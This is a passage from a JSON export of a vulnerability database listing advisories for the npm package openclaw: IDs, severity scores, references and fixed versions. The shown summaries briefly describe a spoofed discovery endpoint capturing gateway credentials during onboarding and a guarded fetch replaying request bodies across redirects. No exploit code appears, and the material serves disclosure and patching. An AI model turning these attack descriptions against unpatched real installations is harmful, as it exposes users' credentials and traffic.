dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulner
ability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulner
ability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulner
ability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["GHSA-77hf-7fqf-f227"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wfsp-szhr-r7eu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91802?format=json","vulnerability_id":"VCID-wkye-je9r-1fba","summary":"O
penClaw: CLI Remote Onboarding Persists Unauthenticated Discovery Endpoint and Exfiltrates Gateway Credentials\n## Summary\n\nRemote onboarding accepted discovered gateway endpoints without an explicit trust confirmation before persisting the remote URL and connection details.\n\n## Impact\n\nA malicious or spoofed discovery endpoint could steer onboarding toward an attacker-controlled gateway and capture future gateway credentials or traffic.\n\n## Affected Component\n\n`src/commands/onboard-remote.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `d6affb17d8` (`CLI: confirm discovered remote gateways before saving config`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41342","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02906","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02957","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0295","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41342"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d6affb17d85f5f5ab08ef9f2b994b257af12e75a","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"
value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d6affb17d85f5f5ab08ef9f2b994b257af12e75a"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3cw3-5vxw-g2h3","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3cw3-5vxw-g2h3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41342","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41342"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-discovery-endpoint-credential-exfiltration-via-remote-onboarding","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-discovery-endpoint-credential-exfil
tration-via-remote-onboarding"},{"reference_url":"https://github.com/advisories/GHSA-3cw3-5vxw-g2h3","reference_id":"GHSA-3cw3-5vxw-g2h3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3cw3-5vxw-g2h3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{
"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{
"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{
"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41342","GHSA-3cw3-5vxw-g2h3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wkye-je9r-1fba"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90198?format=json","vulnerability_id":"VCID-wmr3-83u3-6qdb","summary":"OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects\n## Impact\n\n`fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects.\n\nA guarded fetch could resend unsafe request bodies or headers when following cross-origin redirects.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<2026.3.31`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @BG0ECV for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40037","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11509","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11475","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11511","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40037"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.
com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40037","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40037"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-un
safe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects"},{"reference_url":"https://github.com/advisories/GHSA-qx8j-g322-qj6m","reference_id":"GHSA-qx8j-g322-qj6m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qx8j-g322-qj6m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"}